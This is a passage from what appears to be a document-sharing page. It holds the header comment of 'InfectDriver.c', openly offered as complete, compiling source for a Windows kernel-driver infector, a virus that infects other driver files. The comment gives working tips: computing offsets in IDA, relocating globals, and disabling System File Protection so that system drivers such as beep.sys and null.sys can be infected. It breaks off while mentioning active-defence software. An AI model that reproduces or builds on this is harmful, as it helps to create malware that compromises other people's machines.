完整的驱动.docVIP

完整的驱动 完整的驱动感染.code.编译通过 /* * Module: InfectDriver.c * * Author : 老Y (源自kanxue,不过老Y放的code不完整,需要自己补充) * Fixer : sudami [sudami@163.com] * Time : 08/05/28 * * Comment: * * 半年前一大牛在kanxue进行“驱动感染”扫盲,偶当时没搞明白.半年后突然想起来,于是 * 尝试学习下.由于偶太菜,弄了几个小半天.终于调试成功. 关键点在于计算驱动自身的 * 大小, 编译完驱动后,要用IDA打开它: * 1. 计算出第一个变量到call $+5 处的偏移量. * 2. 计算ulEndaddr到文件末尾的偏移量.一般就是INIT的那一小段dd. * * Description: * * 此驱动的功能很简单,可自己扩充,感染成功后,仅仅创建一个线程不断的打印信息. * 自己扩充功能时,要时刻记着对于全局变量和函数,都得重新定位,用作者提供的 * KGetGlobalVarAddr() 函数即可. 对感染部分进行了详细的注释,对此很陌生的同学 * 可以参考参考. ***** * * 若想感染beep.sys、null.sys等系统文件,记得先去掉SFP.当然,像微点这样的主动防御 * 软件